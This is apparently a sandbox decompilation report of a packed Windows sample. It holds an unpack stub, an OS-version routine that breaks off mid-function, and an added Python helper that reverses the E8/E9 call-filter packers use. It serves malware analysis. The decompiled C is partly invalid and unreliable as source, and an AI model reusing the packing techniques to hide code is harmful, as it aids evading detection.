    			E004200E0(CHAR* _a4) {
    				int _t3;
    
    				_t3 = MessageBoxA(0, _a4, 0x4ad6f4, 0x10); // executed
    				return _t3;
    			}




    Statement addresses (the assembly column did not survive export): 0x004200ee, 0x004200f4

    APIs
    • MessageBoxA.USER32(00000000,?,004AD6F4,00000010), ref: 004200EE
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Message
    • String ID:
    • API String ID: 2030045667-0
    • Opcode ID: 12d9f0fa0f4d61877c44cb3c438c20c4769ac33533449eb6e3796f98d02c1afd
    • Instruction ID: 4c4e367f1f2bdc6f6658e74bc94b2b741ec6354742f1d2de641df68815ad4668
    • Opcode Fuzzy Hash: 12d9f0fa0f4d61877c44cb3c438c20c4769ac33533449eb6e3796f98d02c1afd
    • Instruction Fuzzy Hash: 78B012307843007BFD1087408E0AF1533549769F05F004411B249E44C1C5E0A840965D
    Uniqueness

    Uniqueness Score: -1.00%
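
    Reading the decompiled E0050ABE6 in the record that follows: it commits a 0x1000-byte page with VirtualAlloc(0, 0x1000, 0x1000, 0x40), that is MEM_COMMIT with PAGE_EXECUTE_READWRITE, calls into that page through a function pointer at offset 0x5a9, releases it with VirtualFree(..., 0, 0x8000) (MEM_RELEASE), and then runs a loop that steps through the image one byte at a time, stops only on 0xE8 or 0xE9 (the condition `_t109 - 0xe8 > 1` is false for exactly those two values), rotates the following dword and rewrites it as `stored - position + base`, with an optional marker-byte gate (`_t162[0]`). That is the shape of the call/jmp "E8/E9 filter" that UPX-style packers apply before compression: every rel32 displacement is replaced by a byte-swapped absolute offset so that repeated calls to one function become identical bytes, and the unpack stub reverses it in place after decompression. Whether this sample uses exactly that filter is an inference from the decompiler output, not something the report states. The Python below is an added example, not code from the sample or from Joe Sandbox: it implements the general transform in both directions on a constructed buffer (without the marker-byte variant), so the stub's loop can be checked against a known-good implementation.

```python
import struct
from typing import List

# Opcodes whose rel32 operand the filter rewrites: E8 = call rel32, E9 = jmp rel32.
FILTERED_OPCODES = (0xE8, 0xE9)

# Constructed sample buffer (not taken from the sample): a NOP, a call to the RET at
# offset 11, five NOPs, the RET, and a jmp back to offset 0.
SAMPLE_CODE = bytes([
    0x90,                                # 0: nop
    0xE8, 0x05, 0x00, 0x00, 0x00,        # 1: call +5   -> target 1+5+5 = 11
    0x90, 0x90, 0x90, 0x90, 0x90,        # 6..10: nops
    0xC3,                                # 11: ret
    0xE9, 0xEF, 0xFF, 0xFF, 0xFF,        # 12: jmp -17  -> target 12+5-17 = 0
])


def call_sites(code: bytes) -> List[int]:
    """Offsets of E8/E9 opcodes that are followed by a full 4-byte operand.

    As in the stub's scan loop, the operand bytes are skipped after a hit, so a
    0xE8 inside a displacement is not mistaken for another opcode."""
    sites, i = [], 0
    while i + 5 <= len(code):
        if code[i] in FILTERED_OPCODES:
            sites.append(i)
            i += 5
        else:
            i += 1
    return sites


def filter_calls(code: bytes) -> bytes:
    """Packer side: replace each little-endian rel32 with the big-endian absolute
    offset of its target, so repeated calls to one function become identical bytes."""
    buf = bytearray(code)
    for i in call_sites(code):
        rel = struct.unpack_from("<i", buf, i + 1)[0]
        target = (i + 5 + rel) & 0xFFFFFFFF     # rel32 is relative to the next instruction
        struct.pack_into(">I", buf, i + 1, target)
    return bytes(buf)


def unfilter_calls(code: bytes) -> bytes:
    """Unpack-stub side: byte-swap the stored absolute offset back and subtract the
    position of the next instruction, the 'stored - position + base' step in E0050ABE6
    with base taken as offset 0 of this buffer."""
    buf = bytearray(code)
    for i in call_sites(code):
        target = struct.unpack_from(">I", buf, i + 1)[0]
        rel = (target - (i + 5)) & 0xFFFFFFFF
        struct.pack_into("<I", buf, i + 1, rel)
    return bytes(buf)


def call_targets(code: bytes) -> List[int]:
    """Resolved absolute targets of every E8/E9 in unfiltered code (analyst helper)."""
    return [(i + 5 + struct.unpack_from("<i", code, i + 1)[0]) & 0xFFFFFFFF
            for i in call_sites(code)]
```

    On a real dump, feed the bytes of the unpacked code section to call_targets() and compare the results with the function and import addresses you expect; a mismatch is a sign that the stub uses the marker-byte variant or a base other than the section start, and the stored dwords then need the marker check the decompiled loop performs before the rewrite.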

    C-Code - Quality: 56%
    			E0050ABE6() {
    				CHAR* _v8;
    				intOrPtr _v20;
    				intOrPtr* _v24;
    				struct _STARTUPINFOA _v96;
    				intOrPtr _v100;
    				intOrPtr _v104;
    				intOrPtr _v108;
    				intOrPtr _v807;
    				char _v811;
    				char _v815;
    				intOrPtr _v819;
    				char _v867;
    				char _v875;
    				char _v891;
    				char _v915;
    				char _v935;
    				long _v943;
    				char _v983;
    				char _v999;
    				long _t67;
    				int _t70;
    				unsigned int _t76;
    				signed int _t88;
    				void* _t98;
    				long _t105;
    				void* _t108;
    				void* _t109;
    				unsigned short _t111;
    				unsigned short _t115;
    				long* _t123;
    				void* _t124;
    				long _t126;
    				void* _t127;
    				long* _t128;
    				void* _t129;
    				intOrPtr* _t130;
    				void* _t131;
    				void* _t132;
    				intOrPtr _t133;
    				void* _t136;
    				long _t138;
    				intOrPtr* _t140;
    				signed int _t144;
    				unsigned int _t157;
    				long _t158;
    				char _t161;
    				long* _t162;
    				intOrPtr _t163;
    				long _t166;
    				void* _t168;
    				long _t170;
    				long _t172;
    				void* _t173;
    				void* _t174;
    				long _t178;
    				long _t180;
    				intOrPtr* _t181;
    				long _t185;
    				DWORD* _t188;
    				void* _t189;
    				void* _t190;
    				long _t192;
    				long _t194;
    				void* _t196;
    				void* _t197;
    				intOrPtr _t199;
    
    				_pop(_t196);
    				_t197 = _t196 - 7;
    				_t1 =  &_v915; // 0x50a853
    				_t181 = _t1;
    				if( *_t181 == 0) {
    					L10:
    					 *_t181 = 1;
    					_t16 =  &_v983; // 0xe6000000
    					_t161 = _t197 -  *_t16;
    					_v983 = _t161;
    					_v935 = _v935 + _t161;
    					_t20 =  &_v867; // 0x50a883
    					 *_t20 =  *_t20 + _t161;
    					asm("pushad");
    					_t67 = VirtualAlloc(0, 0x1000, 0x1000, 0x40);
    					__eflags = _t67;
    					if(__eflags == 0) {
    						L50:
    						return _v807(0);
    					} else {
    						_v943 = _t67;
    						L12();
    						_pop(_t124);
    						E0050AF13(__eflags, _t124 + 0x368, _t67);
    						asm("popad");
    						_t23 =  &_v999; // 0xe300000
    						_t172 = _t197 +  *_t23;
    						_t126 = _t172;
    						__eflags =  *_t172;
    						if( *_t172 != 0) {
    							_t138 = 1;
    							_t173 = _t172 +  *_t126;
    							_t126 = _t126 + 4;
    							__eflags = _t126;
    							L15:
    							__eflags =  *_t126;
    							if( *_t126 != 0) {
    								 *_t126 =  *_t126 + _t161;
    								_t180 = _t173 +  *(_t126 + 4);
    								__eflags = _t180;
    								goto L17;
    							}
    						} else {
    							_t180 = _t172 + 4;
    							_t138 = 0;
    							L17:
    							_t25 =  &_v811; // 0x74
    							_t26 =  &_v815; // 0x713a1074
    							_t27 =  &_v943; // 0x40100000
    							 *((intOrPtr*)( *_t27 + 0x5a9))( *_t26,  *_t25, _t138, _t180); // executed
    							_pop(_t136);
    							_pop(_t161);
    							_t138 = _t126;
    							_t173 = _t161;
    							__eflags = _t138;
    							if(_t138 != 0) {
    								_t126 = _t136 + 8;
    								goto L15;
    							}
    						}
    						_t28 =  &_v943; // 0x40100000, executed
    						_t70 = VirtualFree( *_t28, 0, 0x8000);
    						_t30 =  &_v935; // 0x50a83f
    						_t184 = _t30;
    						_t31 =  &(_t184[2]); // 0x11e00
    						_t32 =  &(_t184[4]); // 0x50a84f
    						_t162 = _t32;
    						_t185 =  *_t30;
    						_t170 = _t185;
    						__eflags =  *_t31;
    						if( *_t31 != 0) {
    							goto L20;
    							do {
    								do {
    									L20:
    									_t109 =  *_t170;
    									_t170 = _t170 + 1;
    									__eflags = _t109 - 0xe8 - 1;
    								} while (_t109 - 0xe8 > 1);
    								_t111 =  *_t170;
    								__eflags = _t162[0];
    								if(_t162[0] == 0) {
    									_t133 =  *((intOrPtr*)(_t170 + 4));
    									asm("rol eax, 0x10");
    									_t115 = _t111;
    								} else {
    									goto L22;
    								}
    								L25:
    								 *_t170 = _t115 - _t170 + _t185;
    								_t170 = _t170 + 5;
    								_t70 = _t133 - 0xe8;
    								asm("loop 0xffffffc8");
    								goto L26;
    								L22:
    								__eflags =  *_t170 -  *_t162;
    							} while ( *_t170 !=  *_t162);
    							_t133 =  *((intOrPtr*)(_t170 + 4));
    							asm("rol eax, 0x10");
    							_t115 = _t111 >> 8;
    							goto L25;
    						}
    						L26:
    						E0050AE69(_t70);
    						_t39 =  &_v915; // 0x50a853
    						_t140 = _t39;
    						_t40 = _t140 + 8; // 0x0
    						__eflags =  *_t40;
    						if( *_t40 != 0) {
    							_t41 = _t140 + 0x10; // 0x0
    							_t192 = _t162 -  *_t41;
    							__eflags = _t192;
    							if(_t192 != 0) {
    								 *(_t140 + 0x10) = _t192;
    								_t43 =  &_v867; // 0x50a883
    								_t194 =  *_t43;
    								_t44 = _t194 - 4; // 0x489f5fc
    								_t130 = _t44;
    								__eflags =  *_t140 - 1;
    								if( *_t140 == 1) {
    									_t47 = _t140 + 8; // 0x0
    									_t178 = _t194 +  *_t47;
    									__eflags = _t178;
    									_t48 = _t140 + 0x10; // 0x0
    									_t157 =  *_t48;
    								} else {
    									_t45 = _t140 + 8; // 0x0
    									_t178 = _t162 +  *_t45;
    									_t46 = _t140 + 0x10; // 0x0
    									_t157 =  *_t46;
    								}
    								while(1) {
    									_t178 = _t178 + 1;
    									_t104 = 0;
    									__eflags = 0;
    									if(0 == 0) {
    										break;
    									}
    									__eflags = 0 - 0xef;
    									if(0 > 0xef) {
    										_t108 =  *_t178;
    										_t178 = _t178 + 2;
    										_t104 = _t108;
    										__eflags = 0;
    										if(0 == 0) {
    											_t104 =  *_t178;
    											_t178 = _t178 + 4;
    										}
    									}
    									_t130 = _t130 + _t104;
    									 *_t130 =  *_t130 + _t157;
    								}
    								_t131 = 0;
    								_t170 = _t194;
    								_t105 =  *_t178;
    								__eflags = _t105;
    								if(_t105 != 0) {
    									while(1) {
    										asm("lodsd");
    										_t105 = _t105;
    										__eflags = _t105;
    										if(_t105 == 0) {
    											break;
    										}
    										_t131 = _t131 + _t105;
    										 *((intOrPtr*)(_t170 + _t131)) =  *((intOrPtr*)(_t170 + _t131)) + _t157;
    									}
    									_t132 = 0;
    									_t158 = _t157 >> 0x10;
    									__eflags = _t158;
    									while(1) {
    										asm("lodsd");
    										_t105 = _t105;
    										__eflags = _t105;
    										if(_t105 == 0) {
    											goto L42;
    										}
    										_t132 = _t132 + _t105;
    										 *((intOrPtr*)(_t170 + _t132)) =  *((intOrPtr*)(_t170 + _t132)) + _t158;
    									}
    								}
    							}
    						}
    						L42:
    						_t54 =  &_v983; // 0x50a80f
    						_t163 =  *_t54;
    						_t55 =  &_v891; // 0x50a86b
    						_t181 = _t55;
    						__eflags =  *_t181 - 1;
    						if( *_t181 != 1) {
    							L45:
    							_t127 = _t197;
    							_t123 = _t127 - 0x21;
    							__eflags =  *_t123;
    							if( *_t123 != 0) {
    								_t128 =  &(_t123[0]);
    								_t60 =  &_v983; // 0x50a80f
    								_t188 = _t60;
    								_t166 =  *_t188;
    								_push(_t188);
    								_push(0);
    								_t61 =  &(_t128[1]); // 0x200
    								_t62 =  &(_t128[2]); // 0x163e000
    								VirtualProtect( *_t62 + _t166,  *_t61,  *_t128, _t188);
    								_t129 = _t166;
    								_t181 = _t128;
    								_t123 = _t129 + 0xc;
    								asm("loop 0xffffffe3");
    							}
    							goto L47;
    						} else {
    							_t56 = _t181 + 4; // 0x1569c00
    							_t168 = _t163 +  *_t56;
    							_t98 = _v819(4, _t181, _t168, _t181);
    							_t174 = _t168;
    							_t189 = 0x100;
    							__eflags = _t98 - 1;
    							if(_t98 != 1) {
    								goto L50;
    							} else {
    								_t190 = _t189 + 8;
    								memcpy(_t174, _t190, 8);
    								_t199 = _t199 + 0xc;
    								_t181 = _t190 - 0xc;
    								_t170 = _t190 + 0x10 - 8;
    								__eflags = _t170;
    								_v819(_t170, 0x100,  *((intOrPtr*)(_t181 - 4)), _t181);
    								goto L45;
    							}
    						}
    					}
    				} else {
    					_t15 =  &_v875; // 0x50a87b
    					__eflags =  *_t15 - 1;
    					if( *_t15 == 1) {
    						L47:
    						__eflags = 0;
    						if(0 == 0) {
    							asm("popad");
    							asm("popfd");
    							_push(_t197);
    							_push(0xffffffff);
    							_push(0x49d6f8);
    							_push(E00472CF4);
    							_push( *[fs:0x0]);
    							 *[fs:0x0] = _t199;
    							_push(_t123);
    							_push(_t181);
    							_push(_t170);
    							_v20 = _t199 - 0x58;
    							_t76 = GetVersion();
    							 *0x4e1804 = 0;
    							_t144 = _t76 & 0x000000ff;
    							 *0x4e1800 = _t144;
    							 *0x4e17fc = _t144 << 8;
    							 *0x4e17f8 = _t76 >> 0x10;
    							if(E00474E11(_t144 << 8, 1) == 0) {
    								E0046FE89(0x1c);
    							}
    							if(E00474BCE() == 0) {
    								E0046FE89(0x10);
    							}
    							_v8 = 0;
    							E00474A12();
    							 *0x4e2fe4 = GetCommandLineA();
    							 *0x4e1770 = E004748E0();
    							E00474693();
    							E004745DA();
    							E00473896();
    							_v96.dwFlags = 0;
    							GetStartupInfoA( &_v96);
    							_v104 = E00474582();
    							_t204 = _v96.dwFlags & 0x00000001;
    							if((_v96.dwFlags & 0x00000001) == 0) {
    								_t88 = 0xa;
    							} else {
    								_t88 = _v96.wShowWindow & 0x0000ffff;
    							}
    							_v100 = E00480D6E(GetModuleHandleA(0), 0, _v104, _t88);
    							E004738C3(_t90);
    							_v108 =  *((intOrPtr*)( *_v24));
    							return E0047440A(_t170, _t204,  *((intOrPtr*)( *_v24)), _v24);
    						} else {
    							asm("popad");
    							asm("popfd");
    							return 1;
    						}
    					} else {
    						goto L10;
    					}
    				}
    			}

    [Instruction address column for the function above (0x0050abe6 through 0x0050ae63, plus 0x0046fd5c through 0x0046fe58); only the addresses survived extraction, the per-line instruction text alongside them is not present.]

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 0050AC3A
    Memory Dump Source
    • Source File: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 7d0c79e5c64ec4ebc7937634463cb5eb04307ea62ad31df13ae4adec95eb8862
    • Instruction ID: 3453faa189d47162368fa6467a67e393af4c7c15636ca8a3e3639f76ed588913
    • Opcode Fuzzy Hash: 7d0c79e5c64ec4ebc7937634463cb5eb04307ea62ad31df13ae4adec95eb8862
    • Instruction Fuzzy Hash: 2B014B35E483588FEB334E288C047D9BB78BB41750F1440E9E6C8B62C5D6B5AFC18E55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E00468E90(void* __ecx) {
    				signed int __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				intOrPtr _t430;
    				int _t433;
    				int _t434;
    				int _t443;
    				signed int _t445;
    				void* _t450;
    				void* _t456;
    				void* _t481;
    				intOrPtr _t487;
    				intOrPtr _t499;
    				void* _t512;
    				signed char _t515;
    				signed int _t519;
    				signed int _t522;
    				signed int _t526;
    				signed int _t529;
    				void* _t551;
    				intOrPtr _t553;
    				intOrPtr* _t558;
    				signed char _t564;
    				signed int _t566;
    				signed int _t584;
    				signed int _t585;
    				signed int _t587;
    				signed int _t588;
    				signed int _t609;
    				signed int _t611;
    				signed int _t614;
    				int _t617;
    				signed int _t620;
    				signed int _t622;
    				signed int _t625;
    				signed int _t631;
    				signed int _t633;
    				signed int _t636;
    				signed int _t642;
    				signed int _t644;
    				signed int _t647;
    				signed int _t652;
    				signed int _t654;
    				signed int _t657;
    				intOrPtr _t679;
    				intOrPtr _t702;
    				intOrPtr _t746;
    				intOrPtr _t756;
    				signed int _t823;
    				void* _t828;
    				void* _t829;
    				void* _t830;
    				void* _t831;
    				void* _t832;
    				void* _t837;
    				intOrPtr _t838;
    				signed int _t843;
    				void* _t844;
    				void* _t847;
    				intOrPtr _t849;
    				void* _t850;
    				void* _t851;
    				void* _t852;
    				void* _t853;
    				void* _t854;
    				void* _t856;
    				void* _t858;
    				void* _t859;
    				void* _t861;
    				void* _t862;
    				void* _t864;
    				void* _t865;
    				void* _t866;
    				signed char _t894;
    
    				_push(0xffffffff);
    				_push(E004908CF);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t849;
    				_t850 = _t849 - 0x394;
    				_t847 = __ecx;
    				memset(_t850 + 0x1e0, 0, 0x27 << 2);
    				_t851 = _t850 + 0xc;
    				 *(_t851 + 0x6c) = 0;
    				 *((intOrPtr*)(_t851 + 0x1e4)) = 0x9c;
    				if(GetVersionExA(_t851 + 0x1e0) != 0) {
    					L2:
    					_t430 =  *((intOrPtr*)(_t851 + 0x1f0));
    					if(_t430 == 0) {
    						E00483652(_t847 + 8, "Microsoft Win32s ");
    						 *(_t847 + 4) = 3;
    						L63:
    						_t433 = memset(_t851 + 0x27c, 0, 0x4a << 2);
    						_t852 = _t851 + 0xc;
    						_t434 = memset(_t852 + 0x74, _t433, 0x19 << 2);
    						_t853 = _t852 + 0xc;
    						memset(_t853 + 0x18, _t434, 0x14 << 2);
    						_t854 = _t853 + 0xc;
    						E0046E080(_t854 + 0x10);
    						_t736 = _t854 + 0x27c;
    						 *((intOrPtr*)(_t854 + 0x3b0)) = 0xe;
    						if(E0046E090(_t854 + 0x10, _t854 + 0x27c) == 0) {
    							_push("Failed in call to GetOSVersion");
    							_push(_t854 + 0x74);
    							E0047262F(_t736);
    							_t851 = _t854 + 8;
    							E004833FF(_t847 + 0x10, _t851 + 0x74);
    							E004833FF(_t847 + 0xc, "unknown");
    							E004833FF(_t847 + 0x14, "unknown");
    							_push("unknown");
    							L164:
    							_t442 = E004833FF(_t847 + 0x18);
    							L165:
    							 *(_t851 + 0x3ac) = 0xffffffff;
    							_t443 = E0043E2B0(_t442);
    							L166:
    							 *[fs:0x0] =  *((intOrPtr*)(_t851 + 0x3a4));
    							return _t443;
    						}
    						_t445 =  *((intOrPtr*)(_t854 + 0x31c)) - 1;
    						if(_t445 > 4) {
    							_t609 = _t854 + 0x18;
    							_push("Unknown OS");
    							_push(_t609);
    							E0047262F(_t736);
    							_t856 = _t854 + 8;
    							asm("repne scasb");
    							_t611 =  !(_t609 | 0xffffffff);
    							_t828 = _t854 + 0x20 - _t611;
    							_t584 = _t611;
    							asm("repne scasb");
    							_t614 = _t584 >> 2;
    							memcpy(_t856 + 0x74 - 1, _t828, _t614 << 2);
    							_t617 = _t584 & 0x00000003;
    							__eflags = _t617;
    							memcpy(_t828 + _t614 + _t614, _t828, _t617);
    							_t858 = _t856 + 0x18;
    							L157:
    							_t450 = _t858 + 0x74;
    							L158:
    							E004833FF(_t847 + 0x10, _t450);
    							L159:
    							_t620 =  *(_t858 + 0x310);
    							E0047262F(_t858 + 0x18, _t858 + 0x18, "%d.", _t620);
    							_t859 = _t858 + 0xc;
    							asm("repne scasb");
    							_t622 =  !(_t620 | 0xffffffff);
    							_t829 = _t858 + 0x24 - _t622;
    							_t585 = _t622;
    							asm("repne scasb");
    							_t625 = _t585 >> 2;
    							memcpy(_t859 + 0x74 - 1, _t829, _t625 << 2);
    							_t456 = memcpy(_t829 + _t625 + _t625, _t829, _t585 & 0x00000003);
    							_t861 = _t859 + 0x18;
    							E004833FF(_t847 + 0x14, _t456);
    							_t631 =  *(_t861 + 0x314);
    							E0047262F(_t861 + 0x18, _t861 + 0x18, "%02d", _t631);
    							_t862 = _t861 + 0xc;
    							asm("repne scasb");
    							_t633 =  !(_t631 | 0xffffffff);
    							_t830 = _t861 + 0x24 - _t633;
    							_t743 = _t633;
    							asm("repne scasb");
    							_t636 = _t743 >> 2;
    							memcpy(_t862 + 0x74 - 1, _t830, _t636 << 2);
    							memcpy(_t830 + _t636 + _t636, _t830, _t743 & 0x00000003);
    							_t851 = _t862 + 0x18;
    							E00483652(_t847 + 0x14, _t862 + 0x24);
    							_t464 =  *((intOrPtr*)(_t851 + 0x318));
    							if( *((intOrPtr*)(_t851 + 0x318)) != 0) {
    								_t652 = _t851 + 0x1c;
    								E0047262F(_t743, _t652, "%d", _t464);
    								_t866 = _t851 + 0xc;
    								asm("repne scasb");
    								_t654 =  !(_t652 | 0xffffffff);
    								_t743 = _t866 + 0x74;
    								_t832 = _t851 + 0x24 - _t654;
    								_t588 = _t654;
    								asm("repne scasb");
    								_t657 = _t588 >> 2;
    								memcpy(_t866 + 0x74 - 1, _t832, _t657 << 2);
    								memcpy(_t832 + _t657 + _t657, _t832, _t588 & 0x00000003);
    								_t851 = _t866 + 0x18;
    								E004833FF(_t847 + 0xc, _t866 + 0x24);
    							}
    							_t442 =  *(_t851 + 0x3a0);
    							if( *(_t851 + 0x3a0) == 0) {
    								goto L165;
    							} else {
    								_t642 = _t851 + 0x18;
    								E0047262F(_t743, _t642, "Service Pack %d", _t442 & 0x0000ffff);
    								_t864 = _t851 + 0xc;
    								asm("repne scasb");
    								_t644 =  !(_t642 | 0xffffffff);
    								_t831 = _t851 + 0x24 - _t644;
    								_t587 = _t644;
    								asm("repne scasb");
    								_t647 = _t587 >> 2;
    								memcpy(_t864 + 0x74 - 1, _t831, _t647 << 2);
    								_t865 = _t864 + 0xc;
    								_push(_t865 + 0x18);
    								memcpy(_t831 + _t647 + _t647, _t831, _t587 & 0x00000003);
    								_t851 = _t865 + 0xc;
    								goto L164;
    							}
    						}
    						switch( *((intOrPtr*)(_t445 * 4 +  &M0046A1D4))) {
    							case 0:
    								_t663 = _t854 + 0x18;
    								_push("DOS");
    								_push(_t663);
    								goto L85;
    							case 1:
    								__ecx = __esp + 0x18;
    								_push("Windows");
    								_push(__ecx);
    								goto L85;
    							case 2:
    								__esp + 0x27c = __esp + 0x14;
    								__eax = E0046E350(__esp + 0x27c);
    								__eflags = __eax;
    								if(__eax == 0) {
    									__eax = __esp + 0x27c;
    									__ecx = __esp + 0x10;
    									__eax = E0046E390(__esp + 0x27c);
    									__eflags = __eax;
    									if(__eax == 0) {
    										__edx = __esp + 0x27c;
    										__ecx = __esp + 0x10;
    										__eax = E0046E3D0(__edx);
    										__eflags = __eax;
    										if(__eax == 0) {
    											__esp + 0x27c = __esp + 0x14;
    											__eax = E0046E410(__esp + 0x27c);
    											__eflags = __eax;
    											if(__eax == 0) {
    												__eax = __esp + 0x27c;
    												__ecx = __esp + 0x10;
    												__eax = E0046E450(__esp + 0x27c);
    												__eflags = __eax;
    												if(__eax == 0) {
    													__edx = __esp + 0x27c;
    													__ecx = __esp + 0x10;
    													__eax = E0046E490(__edx);
    													__eflags = __eax;
    													if(__eax == 0) {
    														__esp + 0x27c = __esp + 0x14;
    														__eax = E0046E4D0(__esp + 0x27c);
    														__eflags = __eax;
    														if(__eax == 0) {
    															_push("Windows ??");
    															L84:
    															__eax = __esp + 0x1c;
    															_push(__esp + 0x1c);
    															goto L85;
    														}
    														__edx = __esp + 0x18;
    														_push("Windows Millenium Edition");
    														_push(__edx);
    														goto L85;
    													}
    													_push("Windows 98 Second Edition");
    													goto L84;
    												}
    												__ecx = __esp + 0x18;
    												_push("Windows 98 SP1");
    												_push(__ecx);
    												goto L85;
    											}
    											__edx = __esp + 0x18;
    											_push("Windows 98");
    											_push(__edx);
    											goto L85;
    										}
    										_push("Windows 95 OSR2");
    										goto L84;
    									}
    									__ecx = __esp + 0x18;
    									_push("Windows 95 SP1");
    									_push(__ecx);
    									goto L85;
    								}
    								__edx = __esp + 0x18;
    								_push("Windows 95");
    								_push(__edx);
    								goto L85;
    							case 3:
    								__esp + 0x27c = __esp + 0x14;
    								__eax = E0046E610(__esp + 0x27c);
    								__eflags = __eax;
    								if(__eax == 0) {
    									__eax = __esp + 0x27c;
    									__ecx = __esp + 0x10;
    									__eax = E0046E500(__esp + 0x27c);
    									__eflags = __eax;
    									if(__eax == 0) {
    										__eax = __esp + 0x27c;
    										__ecx = __esp + 0x10;
    										__eax = E0046E530(__esp + 0x27c);
    										__eflags = __eax;
    										if(__eax == 0) {
    											__eax = __esp + 0x27c;
    											__ecx = __esp + 0x10;
    											__eax = E0046E560(__esp + 0x27c);
    											__eflags = __eax;
    											if(__eax == 0) {
    												L154:
    												__eflags =  *(__esp + 0x74);
    												if( *(__esp + 0x74) == 0) {
    													goto L159;
    												}
    												goto L157;
    											}
    											__ecx = __esp + 0x18;
    											_push("Windows 2003");
    											_push(__ecx);
    											__eax = E0047262F(__edx);
    											__edi = __esp + 0x20;
    											__ecx = __ecx | 0xffffffff;
    											__eax = 0;
    											__esp = __esp + 8;
    											asm("repne scasb");
    											__ecx =  !__ecx;
    											__edi = __edi - __ecx;
    											__edx = __esp + 0x74;
    											__esi = __edi;
    											__ebx = __ecx;
    											__edi = __edx;
    											__ecx = __ecx | 0xffffffff;
    											asm("repne scasb");
    											__ecx = __ebx;
    											__edi = __edx - 1;
    											__ecx = __ebx >> 2;
    											__eax = memcpy(__edx - 1, __esi, __ecx << 2);
    											__edi = __esi + __ecx;
    											__edi = __esi + __ecx + __ecx;
    											0 = __ebx;
    											__eax = __esp + 0x27c;
    											__ecx = __ebx & 0x00000003;
    											__eax = memcpy(__edi, __esi, __ecx);
    											__esi + __ecx = __esi + __ecx + __ecx;
    											__ecx = 0;
    											__ecx = __esp + 0x14;
    											__eflags = E0046E970(__esp + 0x14, __eflags, __esp + 0x27c);
    											if(__eflags == 0) {
    												__eax = __esp + 0x27c;
    												__ecx = __esp + 0x10;
    												__eflags = E0046E9A0(__esp + 0x10, __eflags, __esp + 0x27c);
    												if(__eflags == 0) {
    													__eax = __esp + 0x27c;
    													__ecx = __esp + 0x10;
    													__eflags = E0046E9F0(__esp + 0x10, __eflags, __esp + 0x27c);
    													if(__eflags == 0) {
    														__eax = __esp + 0x27c;
    														__ecx = __esp + 0x10;
    														__eflags = E0046EAA0(__esp + 0x10, __eflags, __esp + 0x27c);
    														if(__eflags == 0) {
    															L144:
    															__eax = __esp + 0x27c;
    															__ecx = __esp + 0x10;
    															__eflags = E0046EA70(__esp + 0x10, __eflags, __esp + 0x27c);
    															if(__eflags == 0) {
    																__eax = __esp + 0x27c;
    																__ecx = __esp + 0x10;
    																__eax = E0046EA40(__esp + 0x10, __eflags, __esp + 0x27c);
    																__eflags = __eax;
    																if(__eax == 0) {
    																	L149:
    																	__eax = __esp + 0x27c;
    																	__ecx = __esp + 0x10;
    																	_push(__esp + 0x27c);
    																	__eax = E0046E730();
    																	__eflags = __eax;
    																	if(__eax != 0) {
    																		__ecx = __esp + 0x18;
    																		_push(" Terminal Services");
    																		_push(__ecx);
    																		__eax = E0047262F(__edx);
    																		__edi = __esp + 0x20;
    																		__ecx = __ecx | 0xffffffff;
    																		__eax = 0;
    																		__esp = __esp + 8;
    																		asm("repne scasb");
    																		__ecx =  !__ecx;
    																		__edi = __edi - __ecx;
    																		__edx = __esp + 0x74;
    																		__esi = __edi;
    																		__ebx = __ecx;
    																		__edi = __edx;
    																		__ecx = __ecx | 0xffffffff;
    																		asm("repne scasb");
    																		__ecx = __ebx;
    																		__edi = __edx - 1;
    																		__ecx = __ebx >> 2;
    																		__eax = memcpy(__edx - 1, __esi, __ecx << 2);
    																		__edi = __esi + __ecx;
    																		__edi = __esi + __ecx + __ecx;
    																		0 = __ebx;
